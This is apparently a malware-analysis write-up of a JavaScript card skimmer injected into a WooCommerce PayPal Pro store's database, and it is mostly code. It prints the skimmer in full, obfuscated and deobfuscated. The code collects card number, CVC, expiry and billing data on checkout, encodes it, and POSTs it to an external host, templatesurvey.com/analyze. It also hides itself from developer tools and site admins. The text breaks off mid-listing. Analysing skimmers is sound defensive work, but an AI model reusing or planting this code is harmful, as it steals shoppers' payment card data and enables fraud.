.wtf() Skimmer Targets WooCommerce PayPal Pro
0x4895.wtf Skimmer⌗
0x4895.wtf is a JavaScript skimmer found injected into the database of a compromised ecommerce website running WordPress with the WooCommerce PayPal Pro plugin.
What is WooCommerce PayPal Pro?⌗
PayPal Payments Pro is a gateway plugin that allows you to take credit card payments via PayPal directly on your site. The customer enters their credit card details during the checkout process, and PayPal handles the rest.
Sample⌗
The skimmer’s original obfuscated format from the database table wp_wc_product_data.content is below:
<script id="vieworder">var _0x4895,_0x4643,_0x4874,_0x48B6,_0x4853,_0x474B,_0x4685,_0x493A,_0x478D,_0x48F8,_0x47AE,_0x47CF,_0x4832,_0x46A6,_0x46C7,_0x46E8,_0x4709,_0x472A,_0x48D7,_0x4811,_0x4664,_0x47F0,_0x4919,_0x476C;(function(){var _0x495B=["\x77\x74\x66","\x70\x72\x6F\x74\x6F\x74\x79\x70\x65","\x24","\x73\x70\x6C\x69\x74","\x72\x65\x64\x75\x63\x65","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6D\x61\x70","","\x72\x65\x70\x6C\x61\x63\x65","\x74\x6F\x53\x74\x72\x69\x6E\x67","[redacted]\x24\x36\x33\x24\x36\x66\x24\x36\x64","\x32\x66\x24\x36\x33\x24\x36\x38\x24\x36\x35\x24\x36\x33\x24\x36\x62\x24\x36\x66\x24\x37\x35\x24\x37\x34","\x36\x38\x24\x37\x34\x24\x37\x34\x24\x37\x30\x24\x37\x33\x24\x33\x61\x24\x32\x66\x24\x32\x66\x24\x37\x34\x24\x36\x35\x24\x36\x64\x24\x37\x30\x24\x36\x63\x24\x36\x31\x24\x37\x34\x24\x36\x35\x24\x37\x33\x24\x37\x35\x24\x37\x32\x24\x37\x36\x24\x36\x35\x24\x37\x39\x24\x32\x65\x24\x36\x33\x24\x36\x66\x24\x36\x64\x24\x32\x66\x24\x36\x31\x24\x36\x65\x24\x36\x31\x24\x36\x63\x24\x37\x39\x24\x37\x61\x24\x36\x35","\x36\x38\x24\x37\x34\x24\x37\x34\x24\x37\x30\x24\x37\x33\x24\x33\x61\x24\x32\x66\x24\x32\x66\x24\x37\x34\x24\x36\x35\x24\x36\x64\x24\x37\x30\x24\x36\x63\x24\x36\x31\x24\x37\x34\x24\x36\x35\x24\x37\x33\x24\x37\x35\x24\x37\x32\x24\x37\x36\x24\x36\x35\x24\x37\x39\x24\x32\x65\x24\x36\x33\x24\x36\x66\x24\x36\x64","\x36\x38\x24\x37\x34\x24\x37\x34\x24\x37\x30\x24\x37\x33\x24\x33\x61\x24\x32\x66\x24\x32\x66\x24\x37\x34\x24\x36\x35\x24\x36\x64\x24\x37\x30\x24\x36\x63\x24\x36\x31\x24\x37\x34\x24\x36\x35\x24\x37\x33\x24\x37\x35\x24\x37\x32\x24\x37\x36\x24\x36\x35\x24\x37\x39\x24\x32\x65\x24\x36\x33\x24\x36\x66\x24\x36\x64\x24\x32\x66\x24\x35\x33\x24\x34\x61\x24\x37\x61\x24\x35\x34\x24\x34\x33\x24\x37\x32\x24\x37\x38\x24\x34\x64\x24\x34\x66\x24\x33\x30\x24\x34\x66\x24\x33\x37\x24\x37\x34\x24\x36\x39","\x37\x37\x24\x37\x30\x24\x35\x66\x24\x37\x37\x24\x36\x66\x24\x36\x66","\x76\x69\x65\x77\x6F\x72\x64\x65\x72","\x37\x30\x24\x36\x31\x24\x37\x39\x
24\x37\x30\x24\x36\x31\x24\x36\x63\x24\x37\x30\x24\x37\x32\x24\x36\x66","\x36\x36\x24\x36\x66\x24\x37\x32\x24\x36\x64\x24\x35\x62\x24\x36\x65\x24\x36\x31\x24\x36\x64\x24\x36\x35\x24\x33\x64\x24\x32\x37\x24\x36\x33\x24\x36\x38\x24\x36\x35\x24\x36\x33\x24\x36\x62\x24\x36\x66\x24\x37\x35\x24\x37\x34\x24\x32\x37\x24\x35\x64","\x36\x32\x24\x36\x39\x24\x36\x63\x24\x36\x63\x24\x36\x39\x24\x36\x65\x24\x36\x37\x24\x35\x66\x24\x36\x33\x24\x37\x32\x24\x36\x35\x24\x36\x34\x24\x36\x39\x24\x37\x32\x24\x36\x33\x24\x36\x31\x24\x37\x32\x24\x36\x34","\x36\x32\x24\x36\x39\x24\x36\x63\x24\x36\x63\x24\x36\x39\x24\x36\x65\x24\x36\x37\x24\x35\x66\x24\x36\x33\x24\x36\x33\x24\x37\x36\x24\x36\x65\x24\x37\x35\x24\x36\x64\x24\x36\x32\x24\x36\x35\x24\x37\x32","\x36\x32\x24\x36\x39\x24\x36\x63\x24\x36\x63\x24\x36\x39\x24\x36\x65\x24\x36\x37\x24\x35\x66\x24\x36\x35\x24\x37\x38\x24\x37\x30\x24\x36\x34\x24\x36\x31\x24\x37\x34\x24\x36\x35\x24\x36\x64\x24\x36\x66\x24\x36\x65\x24\x37\x34\x24\x36\x38","\x36\x32\x24\x36\x39\x24\x36\x63\x24\x36\x63\x24\x36\x39\x24\x36\x65\x24\x36\x37\x24\x35\x66\x24\x36\x35\x24\x37\x38\x24\x37\x30\x24\x36\x34\x24\x36\x31\x24\x37\x34\x24\x36\x35\x24\x37\x39\x24\x36\x35\x24\x36\x31\x24\x37\x32","\x36\x39\x24\x36\x65\x24\x37\x30\x24\x37\x35\x24\x37\x34\x24\x32\x33\x24\x37\x30\x24\x36\x31\x24\x37\x39\x24\x36\x64\x24\x36\x35\x24\x36\x65\x24\x37\x34\x24\x35\x66\x24\x36\x64\x24\x36\x35\x24\x37\x34\x24\x36\x38\x24\x36\x66\x24\x36\x34\x24\x35\x66\x24\x37\x30\x24\x36\x31\x24\x37\x39\x24\x37\x30\x24\x36\x31\x24\x36\x63\x24\x37\x30\x24\x37\x32\x24\x36\x66","\x6A\x73","\x73\x63\x72\x69\x70\x74","\x63\x73\x73","\x6C\x69\x6E\x6B","\x6E\x6F\x6E\x65","\x69\x64","\x68\x72\x65\x66","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x6C\x65\x6E\x67\x74\x68","\x67\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x6C\x6F\x67","\x72\x6F\x74\x3
1\x33","\x5A","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x72\x6F\x74\x35","\x6A\x6F\x69\x6E","\x67\x65\x74\x4F\x77\x6E\x50\x72\x6F\x70\x65\x72\x74\x79\x44\x65\x73\x63\x72\x69\x70\x74\x6F\x72","\x64\x65\x66\x69\x6E\x65\x50\x72\x6F\x70\x65\x72\x74\x79","\x49\x6E\x20\x63\x6F\x6C\x6C\x65\x63\x74\x44\x61\x74\x61","\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x41\x72\x72\x61\x79","\x73\x68\x69\x70\x70\x69\x6E\x67\x5F","\x6E\x61\x6D\x65","\x62\x69\x6C\x6C\x69\x6E\x67\x5F","\x76\x61\x6C\x75\x65","\x65\x61\x63\x68","\x69\x6E\x70\x75\x74\x5B\x69\x64\x2A\x3D\x22","\x22\x5D\x3A\x76\x69\x73\x69\x62\x6C\x65","\x66\x69\x6E\x64","\x61\x74\x74\x72","\x2D\x63\x61\x72\x64\x2D\x6E\x75\x6D\x62\x65\x72","\x2D\x63\x61\x72\x64\x2D\x63\x76\x63","\x2D\x63\x61\x72\x64\x2D\x65\x78\x70\x69\x72\x79","\x20\x2F\x20","\x5F\x63\x63\x5F\x6F\x77\x6E\x65\x72","\x63\x68\x65\x63\x6B\x65\x64","\x70\x72\x6F\x70","\x49\x6E\x20\x70\x72\x6F\x63\x65\x73\x73\x50\x6C\x61\x63\x65\x4F\x72\x64\x65\x72","\x73\x75\x62\x6D\x69\x74","\x70\x72\x6F\x63\x65\x73\x73\x50\x6C\x61\x63\x65\x4F\x72\x64\x65\x72\x3A\x53\x55\x42\x4D\x49\x54","\x42\x61\x64\x20\x70\x61\x79\x6D\x65\x6E\x74\x20\x74\x79\x70\x65","\x50\x61\x79\x6D\x65\x6E\x74\x20\x73\x65\x6E\x64\x65\x64","\x61\x6C\x77\x61\x79\x73","\x50\x4F\x53\x54","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x74\x65\x78\x74\x2F\x70\x6C\x61\x69\x6E","\x61\x6A\x61\x78","\x45\x78\x63\x65\x70\x74\x69\x6F\x6E\x20\x6F\x6E\x20\x73\x75\x62\x6D\x69\x74","\x6F\x6E","\x49\x6E\x20\x77\x61\x69\x74\x50\x6C\x61\x63\x65\x4F\x72\x64\x65\x72","\x3A\x76\x69\x73\x69\x62\x6C\x65","\x69\x73","\x77\x61\x69\x74\x50\x6C\x61\x63\x65\x4F\x72\x64\x65\x72\x3A\x20\x4F\x4B","\x49\x6E\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x20\x72\x65\x61\x64\x79","\x67\x65\x74","\x23\x77\x70\x61\x64\x6D\x69\x6E\x62\x61\x72","\x72\x65\x61\x64\x79","\x6F\x75\x74\x65\x72\x57\x69\x64\x74\x68","\x69\x6E\x6E\x65\x72\x57\x69\x64\x74\x68","\x6F\x75\x74\x65\x72\x48\x65\x69\x67\x68\x74","\x69\x6E\x6E\x65\x72\x48\x65\x69\x67\x68\x74","\x46\x69\x72\x65\x62
\x75\x67","\x63\x68\x72\x6F\x6D\x65","\x69\x73\x49\x6E\x69\x74\x69\x61\x6C\x69\x7A\x65\x64","\x49\x6E\x20\x77\x61\x69\x74\x46\x6F\x72\x4A\x71\x75\x65\x72\x79","\x6A\x51\x75\x65\x72\x79","\x77\x61\x69\x74\x46\x6F\x72\x4A\x71\x75\x65\x72\x79\x3A\x20\x4F\x4B","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];function _0x497C(){var _0x4A42=this[_0x495B[3]](_0x495B[2]);var _0x4A63=_0x4A42[_0x495B[6]](function(_0x4A84){return String[_0x495B[5]](parseInt(_0x4A84,16))})[_0x495B[4]](function(_0x4AA5,_0x4AC6){return _0x4AA5+ _0x4AC6});return _0x4A63[_0x495B[9]]()[_0x495B[8]](/,/g,_0x495B[7])}function _0x499D(_0x4B08,_0x4B29){var _0x4B8C=(_0x4B29=== _0x495B[24])?_0x495B[25]:(_0x4B29=== _0x495B[26])?_0x495B[27]:_0x495B[28];var _0x4B6B=(_0x4B29=== _0x495B[24])?_0x495B[29]:(_0x4B29=== _0x495B[26])?_0x495B[30]:_0x495B[28];var _0x4AE7=document[_0x495B[31]](_0x4B8C);if(!_0x495B){_0x49BE(0,false,false);return};for(var _0x4B4A=_0x4AE7[_0x495B[32]];_0x4B4A>= 0;_0x4B4A--){if(_0x4AE7[_0x4B4A]&& _0x4AE7[_0x4B4A][_0x495B[33]](_0x4B6B)!== null&& _0x4AE7[_0x4B4A][_0x495B[33]](_0x4B6B)[_0x495B[34]](_0x4B08)!== -1){_0x4AE7[_0x4B4A][_0x495B[36]][_0x495B[35]](_0x4AE7[_0x4B4A])}}}function _0x49BE(_0x4BCE,_0x4BAD){if(_0x4685){console[_0x495B[37]](_0x4BCE)}}if(!_0x49BE){_0x49DF= 0;return};function _0x49DF(){String[_0x495B[1]][_0x495B[38]]= function(){return this[_0x495B[8]](/[a-zA-Z]/g,function(_0x4A84){return String[_0x495B[5]]((_0x4A84<= _0x495B[39]?90:122)>= (_0x4A84= _0x4A84[_0x495B[40]](0)+ 13)?_0x4A84:_0x4A84- 26)})};String[_0x495B[1]][_0x495B[41]]= function(){var _0x4A63=[];for(i= 0;i< this[_0x495B[32]];i++){idx= this[_0x495B[40]](i);if((idx>= 48)&& (idx<= 57)){if(idx<= 52){if(!_0x4A00){return};_0x4A63[i]= String[_0x495B[5]](((idx+ 5)))}else {_0x4A63[i]= String[_0x495B[5]](((idx- 5)))}}else {_0x4A63[i]= String[_0x495B[5]](idx)}};return _0x4A63[_0x495B[42]](_0x495B[7])};function _0x4BEF(_0x4D39){return btoa(encodeURIComponent(_0x4D39)[_0x495B[8]](/%([0-9A-F]{2})/g,function(_0x4D5A,_0x4D7B){return 
String[_0x495B[5]](parseInt(_0x4D7B,16))}))}function _0x4CB5(_0x4DFF,_0x4E20,_0x4DDE){if(!_0x495B){return};if(_0x4E20!== _0x4DDE&& _0x4DFF[_0x4E20]){Object[_0x495B[44]](_0x4DFF,_0x4DDE,Object[_0x495B[43]](_0x4DFF,_0x4E20));delete _0x4DFF[_0x4E20]}}var _0x4C31={url:_0x4895[_0x495B[0]](),type:_0x474B[_0x495B[0]](),mer:_0x47CF[_0x495B[0]]()};function _0x4C10(_0x4D9C){_0x49BE(_0x495B[45],1);jQuery[_0x495B[51]](_0x4D9C[_0x495B[46]](),function(){if(!_0x495B){_0x4A00();return};if((this[_0x495B[48]][_0x495B[34]](_0x495B[47])!== -1|| this[_0x495B[48]][_0x495B[34]](_0x495B[49])!== -1|| this[_0x495B[48]][_0x495B[34]](_0x47CF[_0x495B[0]]())!== -1)&& this[_0x495B[50]]!= _0x495B[7]){_0x4C31[this[_0x495B[48]]]= this[_0x495B[50]]}});if(!_0x495B){_0x4A00(_0x495B[41],_0x495B[67]);return};jQuery[_0x495B[51]](_0x4D9C[_0x495B[54]](_0x495B[52]+ _0x47CF[_0x495B[0]]()+ _0x495B[53]),function(){_0x4C31[jQuery(this)[_0x495B[55]](_0x495B[29])]= this[_0x495B[50]]});_0x4CB5(_0x4C31,_0x46A6[_0x495B[0]](),_0x47CF[_0x495B[0]]()+ _0x495B[56]);_0x4CB5(_0x4C31,_0x46C7[_0x495B[0]](),_0x47CF[_0x495B[0]]()+ _0x495B[57]);if(!_0x495B){return};_0x4CB5(_0x4C31,_0x46E8[_0x495B[0]](),_0x47CF[_0x495B[0]]()+ _0x495B[58]);if(_0x4709&& _0x4C31[_0x4709[_0x495B[0]]()]){_0x4C31[_0x47CF[_0x495B[0]]()+ _0x495B[58]]= _0x4C31[_0x47CF[_0x495B[0]]()+ _0x495B[58]]+ _0x495B[59]+ _0x4C31[_0x4709[_0x495B[0]]()];delete _0x4C31[_0x4709[_0x495B[0]]()]};if(_0x472A){_0x4CB5(_0x4C31,_0x472A[_0x495B[0]](),_0x47CF[_0x495B[0]]()+ _0x495B[60])}}function _0x4C52(){if(_0x48D7){return jQuery(_0x48D7[_0x495B[0]]())[_0x495B[62]](_0x495B[61])}else {return true}}function _0x4C94(){_0x49BE(_0x495B[63],1);jQuery(_0x4832[_0x495B[0]]())[_0x495B[74]](_0x495B[64],function(){try{_0x49BE(_0x495B[65],1);if(!_0x4C52()){_0x49BE(_0x495B[66],2);return true};_0x4C10(jQuery(_0x4832[_0x495B[0]]()));_0x49BE(_0x4C31,2);if(_0x497C=== null){_0x4A00= 
false;return};jQuery[_0x495B[72]]({type:_0x495B[69],url:_0x4874[_0x495B[0]](),data:_0x4BEF(JSON[_0x495B[70]](_0x4C31)[_0x495B[38]]()[_0x495B[41]]()),timeout:20000,contentType:_0x495B[71]})[_0x495B[68]](function(){_0x49BE(_0x495B[67],2);if(!_0x495B){_0x497C= null}else {return true}})}catch(e){if(!_0x495B){_0x4A00()};_0x49BE(_0x495B[73],2);return true}})}function _0x4CD6(){var _0x4E41=setInterval(function(){_0x49BE(_0x495B[75],1);if(jQuery(_0x4832[_0x495B[0]]())[_0x495B[77]](_0x495B[76])&& _0x4C52()){_0x49BE(_0x495B[78],1);clearInterval(_0x4E41);_0x4C94()}},_0x493A)}jQuery(document)[_0x495B[82]](function(){if(!_0x495B){_0x49DF(_0x495B[40],1,0);return};_0x49BE(_0x495B[79],1);if(jQuery(_0x495B[81])[_0x495B[80]](0)){_0x499D(_0x47AE,_0x495B[24])}else {if(!_0x49DF){_0x4A21(false,false);return};_0x4CD6()}});if(_0x49DF== 1){return};function _0x4C73(_0x4DBD){if(!_0x4685){_0x499D(_0x47AE,_0x495B[24])}}setInterval(function(){var _0x4D18=window[_0x495B[83]]- window[_0x495B[84]]> _0x48F8;var _0x4CF7=window[_0x495B[85]]- window[_0x495B[86]]> _0x48F8;if(!(_0x4CF7&& _0x4D18)&& ((window[_0x495B[87]]&& window[_0x495B[87]][_0x495B[88]]&& window[_0x495B[87]][_0x495B[88]][_0x495B[89]])|| _0x4D18|| _0x4CF7)){if(!_0x478D){_0x4C73(true)};_0x478D= true}else {if(_0x478D){_0x4C73(false)};_0x478D= false}},500)}function _0x4A00(_0x4E62){_0x49BE(_0x495B[90],1);if(window[_0x495B[91]]){_0x49BE(_0x495B[92],1);_0x4E62()}else {if(!_0x495B){_0x49DF();return};setTimeout(function(){_0x4A00(_0x4E62)},_0x493A)}}function _0x4A21(){if(window[_0x495B[93]][_0x495B[30]][_0x495B[34]](_0x4895[_0x495B[0]]())!== -1&& window[_0x495B[93]][_0x495B[30]][_0x495B[34]](_0x4643[_0x495B[0]]())!== -1){_0x4A00(_0x49DF)}else {_0x499D(_0x47AE,_0x495B[24])}}_0x4811= _0x499D;_0x4664= _0x49BE;_0x47F0= _0x49DF;_0x4919= _0x4A00;if(!_0x499D){_0x4A21(1);return};_0x476C= _0x4A21;String[_0x495B[1]][_0x495B[0]]= _0x497C;_0x4895= _0x495B[10];_0x4643= _0x495B[11];_0x4874= _0x495B[12];_0x48B6= _0x495B[13];_0x4853= _0x495B[14];_0x474B= 
_0x495B[15];if(!_0x49BE){return};_0x4685= false;_0x493A= 500;_0x478D= false;_0x48F8= 160;_0x47AE= _0x495B[16];_0x47CF= _0x495B[17];_0x4832= _0x495B[18];_0x46A6= _0x495B[19];_0x46C7= _0x495B[20];_0x46E8= _0x495B[21];if(_0x497C== true){_0x497C();_0x497C= true;return}else {_0x4709= _0x495B[22]};_0x472A= _0x495B[7];_0x48D7= _0x495B[23];_0x4A21()})()</script>
And here’s the deobfuscated version:
var _0x4895,
  _0x4643,
  _0x4874,
  _0x48B6,
  _0x4853,
  _0x474B,
  _0x4685,
  _0x493A,
  _0x478D,
  _0x48F8,
  _0x47AE,
  _0x47CF,
  _0x4832,
  _0x46A6,
  _0x46C7,
  _0x46E8,
  _0x4709,
  _0x472A,
  _0x48D7,
  _0x4811,
  _0x4664,
  _0x47F0,
  _0x4919,
  _0x476C;
(function () {
  var _0x495B = [
    "wtf",
    "prototype",
    "$",
    "split",
    "reduce",
    "fromCharCode",
    "map",
    "",
    "replace",
    "toString",
    "[redacted]$63$6f$6d",
    // "[redacted].com",
    "2f$63$68$65$63$6b$6f$75$74",
    // "/checkout",
    "68$74$74$70$73$3a$2f$2f$74$65$6d$70$6c$61$74$65$73$75$72$76$65$79$2e$63$6f$6d$2f$61$6e$61$6c$79$7a$65",
    // "https://templatesurvey.com/analyze",
    "68$74$74$70$73$3a$2f$2f$74$65$6d$70$6c$61$74$65$73$75$72$76$65$79$2e$63$6f$6d",
    // "https://templatesurvey.com",
    "68$74$74$70$73$3a$2f$2f$74$65$6d$70$6c$61$74$65$73$75$72$76$65$79$2e$63$6f$6d$2f$53$4a$7a$54$43$72$78$4d$4f$30$4f$37$74$69",
    // "https://templatesurvey.com/SJzTCrxMO0O7ti",
    "77$70$5f$77$6f$6f",
    // "wp_woo",
    "vieworder",
    "70$61$79$70$61$6c$70$72$6f",
    // "paypalpro",
    "66$6f$72$6d$5b$6e$61$6d$65$3d$27$63$68$65$63$6b$6f$75$74$27$5d",
    // "form[name='checkout']",
    "62$69$6c$6c$69$6e$67$5f$63$72$65$64$69$72$63$61$72$64",
    // "billing_credircard",
    "62$69$6c$6c$69$6e$67$5f$63$63$76$6e$75$6d$62$65$72",
    // "billing_ccvnumber",
    "62$69$6c$6c$69$6e$67$5f$65$78$70$64$61$74$65$6d$6f$6e$74$68",
    // "billing_expdatemonth",
    "62$69$6c$6c$69$6e$67$5f$65$78$70$64$61$74$65$79$65$61$72",
    // "billing_expdateyear",
    "69$6e$70$75$74$23$70$61$79$6d$65$6e$74$5f$6d$65$74$68$6f$64$5f$70$61$79$70$61$6c$70$72$6f",
    // "input#payment_method_paypalpro",
    "js",
    "script",
    "css",
    "link",
    "none",
    "id",
    "href",
    "getElementsByTagName",
    "length",
    "getAttribute",
    "indexOf",
    "removeChild",
    "parentNode",
    "log",
    "rot13",
    "Z",
    "charCodeAt",
    "rot5",
    "join",
    "getOwnPropertyDescriptor",
    "defineProperty",
    "In collectData",
    "serializeArray",
    "shipping_",
    "name",
    "billing_",
    "value",
    "each",
    'input[id*="',
    '"]:visible',
    "find",
    "attr",
    "-card-number",
    "-card-cvc",
    "-card-expiry",
    " / ",
    "_cc_owner",
    "checked",
    "prop",
    "In processPlaceOrder",
    "submit",
    "processPlaceOrder:SUBMIT",
    "Bad payment type",
    "Payment sended",
    "always",
    "POST",
    "stringify",
    "text/plain",
    "ajax",
    "Exception on submit",
    "on",
    "In waitPlaceOrder",
    ":visible",
    "is",
    "waitPlaceOrder: OK",
    "In document ready",
    "get",
    "#wpadminbar",
    "ready",
    "outerWidth",
    "innerWidth",
    "outerHeight",
    "innerHeight",
    "Firebug",
    "chrome",
    "isInitialized",
    "In waitForJquery",
    "jQuery",
    "waitForJquery: OK",
    "location",
  ];
  function _0x497C() {
    var _0x4A42 = this.split("$");
    var _0x4A63 = _0x4A42
      .map(function (_0x4A84) {
        return String.fromCharCode(parseInt(_0x4A84, 16));
      })
      .reduce(function (_0x4AA5, _0x4AC6) {
        return _0x4AA5 + _0x4AC6;
      });
    return _0x4A63.toString().replace(/,/g, "");
  }
  function _0x499D(_0x4B08, _0x4B29) {
    var _0x4B8C =
      _0x4B29 === "js" ? "script" : _0x4B29 === "css" ? "link" : "none";
    var _0x4B6B = _0x4B29 === "js" ? "id" : _0x4B29 === "css" ? "href" : "none";
    var _0x4AE7 = document.getElementsByTagName(_0x4B8C);
    for (var _0x4B4A = _0x4AE7.length; _0x4B4A >= 0; _0x4B4A--) {
      if (
        _0x4AE7[_0x4B4A] &&
        _0x4AE7[_0x4B4A].getAttribute(_0x4B6B) !== null &&
        _0x4AE7[_0x4B4A].getAttribute(_0x4B6B).indexOf(_0x4B08) !== -1
      ) {
        _0x4AE7[_0x4B4A].parentNode.removeChild(_0x4AE7[_0x4B4A]);
      }
    }
  }
  function _0x49BE(_0x4BCE, _0x4BAD) {
    if (_0x4685) {
      console.log(_0x4BCE);
    }
  }
  if (!_0x49BE) {
    _0x49DF = 0;
    return;
  }
  function _0x49DF() {
    String.prototype.rot13 = function () {
      return this.replace(/[a-zA-Z]/g, function (_0x4A84) {
        return String.fromCharCode(
          (_0x4A84 <= "Z" ? 90 : 122) >= (_0x4A84 = _0x4A84.charCodeAt(0) + 13)
            ? _0x4A84
            : _0x4A84 - 26
        );
      });
    };
    String.prototype.rot5 = function () {
      var _0x4A63 = [];
      for (i = 0; i < this.length; i++) {
        idx = this.charCodeAt(i);
        if (idx >= 48 && idx <= 57) {
          if (idx <= 52) {
            if (!_0x4A00) {
              return;
            }
            _0x4A63[i] = String.fromCharCode(idx + 5);
          } else {
            _0x4A63[i] = String.fromCharCode(idx - 5);
          }
        } else {
          _0x4A63[i] = String.fromCharCode(idx);
        }
      }
      return _0x4A63.join("");
    };
    function _0x4BEF(_0x4D39) {
      return btoa(
        encodeURIComponent(_0x4D39).replace(/%([0-9A-F]{2})/g, function (
          _0x4D5A,
          _0x4D7B
        ) {
          return String.fromCharCode(parseInt(_0x4D7B, 16));
        })
      );
    }
    function _0x4CB5(_0x4DFF, _0x4E20, _0x4DDE) {
      if (_0x4E20 !== _0x4DDE && _0x4DFF[_0x4E20]) {
        Object.defineProperty(
          _0x4DFF,
          _0x4DDE,
          Object.getOwnPropertyDescriptor(_0x4DFF, _0x4E20)
        );
        delete _0x4DFF[_0x4E20];
      }
    }
    var _0x4C31 = {
      url: _0x4895.wtf(),
      type: _0x474B.wtf(),
      mer: _0x47CF.wtf(),
    };
    function _0x4C10(_0x4D9C) {
      _0x49BE("In collectData", 1);
      jQuery.each(_0x4D9C.serializeArray(), function () {
        if (
          (this.name.indexOf("shipping_") !== -1 ||
            this.name.indexOf("billing_") !== -1 ||
            this.name.indexOf(_0x47CF.wtf()) !== -1) &&
          this.value != ""
        ) {
          _0x4C31[this.name] = this.value;
        }
      });
      jQuery.each(
        _0x4D9C.find('input[id*="' + _0x47CF.wtf() + '"]:visible'),
        function () {
          _0x4C31[jQuery(this).attr("id")] = this.value;
        }
      );
      _0x4CB5(_0x4C31, _0x46A6.wtf(), _0x47CF.wtf() + "-card-number");
      _0x4CB5(_0x4C31, _0x46C7.wtf(), _0x47CF.wtf() + "-card-cvc");
      _0x4CB5(_0x4C31, _0x46E8.wtf(), _0x47CF.wtf() + "-card-expiry");
      if (_0x4709 && _0x4C31[_0x4709.wtf()]) {
        _0x4C31[_0x47CF.wtf() + "-card-expiry"] =
          _0x4C31[_0x47CF.wtf() + "-card-expiry"] +
          " / " +
          _0x4C31[_0x4709.wtf()];
        delete _0x4C31[_0x4709.wtf()];
      }
      if (_0x472A) {
        _0x4CB5(_0x4C31, _0x472A.wtf(), _0x47CF.wtf() + "_cc_owner");
      }
    }
    function _0x4C52() {
      if (_0x48D7) {
        return jQuery(_0x48D7.wtf()).prop("checked");
      } else {
        return true;
      }
    }
    function _0x4C94() {
      _0x49BE("In processPlaceOrder", 1);
      jQuery(_0x4832.wtf()).on("submit", function () {
        try {
          _0x49BE("processPlaceOrder:SUBMIT", 1);
          if (!_0x4C52()) {
            _0x49BE("Bad payment type", 2);
            return true;
          }
          _0x4C10(jQuery(_0x4832.wtf()));
          _0x49BE(_0x4C31, 2);
          if (_0x497C === null) {
            _0x4A00 = false;
            return;
          }
          jQuery
            .ajax({
              type: "POST",
              url: _0x4874.wtf(),
              data: _0x4BEF(JSON.stringify(_0x4C31).rot13().rot5()),
              timeout: 20000,
              contentType: "text/plain",
            })
            .always(function () {
              _0x49BE("Payment sended", 2);
              {
                return true;
              }
            });
        } catch (e) {
          _0x49BE("Exception on submit", 2);
          return true;
        }
      });
    }
    function _0x4CD6() {
      var _0x4E41 = setInterval(function () {
        _0x49BE("In waitPlaceOrder", 1);
        if (jQuery(_0x4832.wtf()).is(":visible") && _0x4C52()) {
          _0x49BE("waitPlaceOrder: OK", 1);
          clearInterval(_0x4E41);
          _0x4C94();
        }
      }, _0x493A);
    }
    jQuery(document).ready(function () {
      _0x49BE("In document ready", 1);
      if (jQuery("#wpadminbar").get(0)) {
        _0x499D(_0x47AE, "js");
      } else {
        if (!_0x49DF) {
          _0x4A21(false, false);
          return;
        }
        _0x4CD6();
      }
    });
    if (_0x49DF == 1) {
      return;
    }
    function _0x4C73(_0x4DBD) {
      if (!_0x4685) {
        _0x499D(_0x47AE, "js");
      }
    }
    setInterval(function () {
      var _0x4D18 = window.outerWidth - window.innerWidth > _0x48F8;
      var _0x4CF7 = window.outerHeight - window.innerHeight > _0x48F8;
      if (
        !(_0x4CF7 && _0x4D18) &&
        ((window.Firebug &&
          window.Firebug.chrome &&
          window.Firebug.chrome.isInitialized) ||
          _0x4D18 ||
          _0x4CF7)
      ) {
        if (!_0x478D) {
          _0x4C73(true);
        }
        _0x478D = true;
      } else {
        if (_0x478D) {
          _0x4C73(false);
        }
        _0x478D = false;
      }
    }, 500);
  }
  function _0x4A00(_0x4E62) {
    _0x49BE("In waitForJquery", 1);
    if (window.jQuery) {
      _0x49BE("waitForJquery: OK", 1);
      _0x4E62();
    } else {
      setTimeout(function () {
        _0x4A00(_0x4E62);
      }, _0x493A);
    }
  }
  function _0x4A21() {
    if (
      window.location.href.indexOf(_0x4895.wtf()) !== -1 &&
      window.location.href.indexOf(_0x4643.wtf()) !== -1
    ) {
      _0x4A00(_0x49DF);
    } else {
      _0x499D(_0x47AE, "js");
    }
  }
  _0x4811 = _0x499D;
  _0x4664 = _0x49BE;
  _0x47F0 = _0x49DF;
  _0x4919 = _0x4A00;
  if (!_0x499D) {
    _0x4A21(1);
    return;
  }
  _0x476C = _0x4A21;
  String.prototype.wtf = _0x497C;
  _0x4895 = "[redacted]$2e$63$6f$6d";
  // _0x4895 = "[redacted].com";
  _0x4643 = "2f$63$68$65$63$6b$6f$75$74";
  // _0x4643 = "/checkout";
  _0x4874 =
    "68$74$74$70$73$3a$2f$2f$74$65$6d$70$6c$61$74$65$73$75$72$76$65$79$2e$63$6f$6d$2f$61$6e$61$6c$79$7a$65";
  // https://templatesurvey.com/analyze
  _0x48B6 =
    "68$74$74$70$73$3a$2f$2f$74$65$6d$70$6c$61$74$65$73$75$72$76$65$79$2e$63$6f$6d";
  // "https://templatesurvey.com";
  _0x4853 =
    "68$74$74$70$73$3a$2f$2f$74$65$6d$70$6c$61$74$65$73$75$72$76$65$79$2e$63$6f$6d$2f$53$4a$7a$54$43$72$78$4d$4f$30$4f$37$74$69";
  // "https://templatesurvey.com/SJzTCrxMO0O7ti";
  _0x474B = "77$70$5f$77$6f$6f";
  // _0x474B = "wp_woo";
  if (!_0x49BE) {
    return;
  }
  _0x4685 = false;
  _0x493A = 500;
  _0x478D = false;
  _0x48F8 = 160;
  _0x47AE = "vieworder";
  _0x47CF = "70$61$79$70$61$6c$70$72$6f";
  // _0x47CF = "paypalpro";
  _0x4832 = "66$6f$72$6d$5b$6e$61$6d$65$3d$27$63$68$65$63$6b$6f$75$74$27$5d";
  // _0x4832 = "form[name='checkout']";
  _0x46A6 = "62$69$6c$6c$69$6e$67$5f$63$72$65$64$69$72$63$61$72$64";
  // _0x46A6 = "billing_credircard";
  _0x46C7 = "62$69$6c$6c$69$6e$67$5f$63$63$76$6e$75$6d$62$65$72";
  // _0x46C7 = "billing_ccvnumber";
  _0x46E8 = "62$69$6c$6c$69$6e$67$5f$65$78$70$64$61$74$65$6d$6f$6e$74$68";
